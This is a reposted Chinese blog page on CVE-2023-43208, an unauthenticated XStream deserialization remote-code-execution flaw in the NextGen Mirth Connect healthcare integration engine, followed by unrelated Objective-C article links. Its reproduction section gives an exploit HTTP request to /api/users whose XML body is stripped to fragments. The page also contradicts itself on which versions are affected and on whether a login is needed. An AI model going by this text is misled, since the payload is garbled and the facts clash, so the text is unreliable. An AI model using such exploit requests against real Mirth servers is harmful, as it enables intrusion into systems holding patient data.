NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208)-白红宇

NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208)

阅读量：800 次

发布时间：2023-02-15

本文共 501 字，大约阅读时间需要 1 分钟。

NextGen Mirth Connect 是美国 NextGen 公司开发的医疗集成引擎，主要用于医疗系统的数据交换与集成，支持多种协议和行业标准。

漏洞概述

NextGen Mirth Connect 4.4.1 及之前版本存在一个远程代码执行漏洞。该漏洞未经身份验证的攻击者可利用，可能导致远程代码执行。

影响范围

该漏洞影响所有版本的 NextGen Mirth Connect，版本号小于 4.4.1 的系统均存在此漏洞。

复现环境

为复现该漏洞，建议环境配置如下：

登录 Mirth Connect 管理员界面（通常在 http://Mirth-IP:8080 地址访问）

确保系统处于正常运行状态

漏洞复现

通过 POST 请求发送特定请求头和内容即可触发漏洞。以下是示例：

POST /api/users HTTP/1.1Host: your-ipX-Requested-With: OpenAPIContent-Type: application/xml
     
    
     abcd
      
        
     
      java.lang.Comparable

转载地址：http://oxcfk.baihongyu.com/

你可能感兴趣的文章

Objective-C实现有序表查找算法(附完整源码)

Objective-C实现有限状态机(附完整源码)

Objective-C实现有限状态自动机FSM(附完整源码)

Objective-C实现有限集上给定关系的自反关系矩阵和对称闭包关系矩阵(附完整源码)

Objective-C实现服务程序自启动(附完整源码)

Objective-C实现服务端客户端聊天室(附完整源码)

Objective-C实现朴素贝叶斯算法(附完整源码)

Objective-C实现杨氏3X3矩阵(附完整源码)

Objective-C实现杰卡德距离算法(附完整源码)

Objective-C实现极值距离算法(附完整源码)

Objective-C实现极小极大算法(附完整源码)

Objective-C实现构造n以内的素数表（附完整源码）

Objective-C实现某文件夹下文件重命名（附完整源码）

Objective-C实现查找second Largest Element第二大元素算法（附完整源码）

Objective-C实现查找整数数组中给定的最小数字算法（附完整源码）

Objective-C实现查找给定节点数的树中可能的二叉搜索树的数量树算法(附完整源码)

Objective-C实现查找链表的中间元素算法(附完整源码)

Objective-C实现样条插值（附完整源码）

Objective-C实现根据cpu和磁盘序列号生成注册码( 附完整源码)

Objective-C实现格雷码序列算法(附完整源码)